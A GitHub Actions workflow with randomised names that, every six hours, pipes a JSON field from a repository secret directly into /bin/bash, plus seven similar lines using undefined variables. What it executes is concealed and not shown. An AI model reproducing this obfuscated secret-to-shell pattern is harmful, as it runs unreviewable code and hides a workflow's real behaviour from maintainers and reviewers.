name: laomeizileng
on:
  workflow_dispatch:
  schedule:
    - cron: '58 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laomeizileng
        env:
          hykh56179: ${{ secrets.hykh56179 }}
        run: |
          echo $hykh56179 | jq -r .tm923 | /bin/bash
          echo $xrhy3 | jq -r .pes645 | /bin/bash
          echo $i640 | jq -r .mymdl3 | /bin/bash
          echo $nejyo468 | jq -r .hq45961 | /bin/bash
          echo $d00692 | jq -r .vweh9586 | /bin/bash
          echo $vkt28 | jq -r .jx9277 | /bin/bash
          echo $uxv310 | jq -r .f25 | /bin/bash
          echo $am44 | jq -r .yjw6 | /bin/bash

